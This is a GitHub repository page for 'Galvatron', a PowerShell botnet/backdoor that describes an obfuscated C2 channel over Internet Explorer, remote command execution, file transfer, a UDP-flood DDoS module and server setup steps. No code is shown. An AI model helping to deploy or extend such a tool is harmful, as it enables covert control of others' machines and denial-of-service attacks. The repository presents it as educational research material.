Skip to content

Powershell fork of Monohard by Carlos Ganoza P. This botnet/backdoor was designed to egress over unecrypted web using very little, but effective obfuscation. Egress over ICMP and DNS are planned as features. Lastly, the server code is designed to setup the C2 on a LAMP-esque server. The default creds are admin/admin.

Notifications You must be signed in to change notification settings

khr0x40sh/Galvatron

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

38 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

#Galvatron Powershell fork (with upgrades) of the Monohard botnet (Carlos Ganoza P.). Default creds are admin/admin

  1. Features

    Utilizes Internet Explorer as the C2 channel Checks in via an obfuscated POST disguised as a login attempt Posts back stdout and stderr of commands run Contains an udpflood module for DDoS tests Supports download and upload of files

  2. Install

    Server Requires typical LAMP setup. Run install.sh for default setup. This assumes /var/www as your apache content directory. Change the install script as needed. This will setup the server in a default state. User assumes risk of using default installation. Login via /bot/login.php. The server code contains several known vulnerabilites as it merely forked code from the original code with simple functionality updates. As this is experimental code provided for educational purporses, it is highly encouraged to roll your own, and/or not use this code in production environments.

    Client Run galvatron.ps1 from the client directory either via the file or in memory. If using udpflood, ensure either the udpflood.ps1 file is local or can be accessed in memory. Ensure script is being run in x86 mode as currently the IE COM object on 64 bit seems buggy.

Twitter: @khr0x40sh Email: khr0x40sh@gmail.com Site: http://khr0x40sh.wordpress.com

About

Powershell fork of Monohard by Carlos Ganoza P. This botnet/backdoor was designed to egress over unecrypted web using very little, but effective obfuscation. Egress over ICMP and DNS are planned as features. Lastly, the server code is designed to setup the C2 on a LAMP-esque server. The default creds are admin/admin.

Resources

Security policy

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published